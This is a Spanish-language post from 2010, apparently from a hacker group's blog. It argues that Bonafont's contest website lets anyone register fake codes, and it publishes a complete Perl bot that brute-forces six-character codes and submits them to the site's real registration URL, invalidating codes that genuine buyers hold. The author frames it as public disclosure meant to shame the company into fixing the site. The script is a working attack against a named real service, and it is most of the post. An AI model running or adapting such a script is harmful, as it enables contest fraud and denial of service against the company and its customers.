Autor: Molder  Fecha:10 Jun 2010

Bonafont tiene una promoción con vigencia del 01 de Junio al 31 de Julio del 2010 que permite ganar premios económicos y descuentos en tiendas y restaurantes.

Instrucciones de la promoción:

[*] Con productos Bonafont participantes, junta la frase "YA GANÉ" impresa en dos botellas ó tapas
[*] Registra los códigos de tus botellas o tapas.

Dirán, este tipo y sus campañas publicitarias, pero no, el tema a tratar aquí es que es vergonzoso que en México existan sistemas WEB como el que usa actualmente Bonafont, donde solo ingresamos códigos ficticios y obtenemos premios.

Tal vez sea necesario presentar los empaques Bonafont, sin embargo, el sistema es vulnerable a una Negación de servicios al cliente ya que es posible crear un script que se encargue de hacer registros de códigos falsos dejándolos inservibles para aquellos usuarios que realmente compraron algún producto e intentan registrarlo, esto pone en riesgo la credibilidad del concurso y da una mala imagen a Bonafont.


Estas son algunas impresiones de pantalla de la pagina de Bonafont.





Como podemos ver es muy fácil hacer registros, solo bastaría dejar corriendo el siguiente script para invalidar miles de códigos.

#!/usr/bin/perl 

#Powered by Sombrero de paja Molder 

#Aztlan Hack I. S. T. http://aztlan-hack.org 

#Molder Sombrero de paja 

#BONABONTF BOT Pa CHingar sus promociones



use LWP::UserAgent; 

use HTTP::Request; 

use LWP::Simple; 

use HTTP::Request::Common; 



$host = "http://www.bonafont.com/bonafont/participarHecho.php"; 



print "\n[+] Conectando con $host\n"; 



$charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";



@contenedor = split('',$charset);







sub recurse



{



 	my $width = $_[0];



	my $position = $_[1];



	my $base_string = $_[2];



	



	my ($j);



	



	for ($j = 0; $j < length($charset); $j++) 



	{

		



       		if ($position == $width)



		{	

			$codigo[$j] = $base_string . $contenedor[$j];

			

			if($j eq length($charset)-1 )

			{

				for ($j = 0; $j < length($charset); $j+=2) 



				{				

					my $useragent = LWP::UserAgent->new();		 

					$useragent->agent("Sombrero de paja"); 

					$useragent->timeout(10); 

					my $respuesta = $useragent->request(POST $host, [	em2=>"name\@email.com",

												articulo2=>"5",

												presentacion2=>"31",

												ya2=>$codigo[$j],

												articulo3=>"1",

												presentacion3=>"8", 

												ganaste2=>$codigo[$j+1],

												checkbox2 => "1",

												nuevoRegistro=>"0",

												tipo => "0"]);

	

					$useragent->default_header(Referer => "http://www.bonafont.com/bonafont/participar.html"); 



					print "Ya: ".$codigo[$j]." Gane: ".$codigo[$j+1]."\n";  	

				}	

			}					

		}



    		else



		{



			my $base_string = $base_string . $contenedor[$j];



			my $position = $position +1;



			&recurse($width, $position, $base_string);



        	}



	}

	



}

	

&recurse("6",1, '');



print "[+] Fin del programa\n";

Espero que Bonafont ponga atención en esto y sus desarrolladores creen sistemas mas fiables. Esto se trasmite con intenciones de mejorar no seas un programador del montón.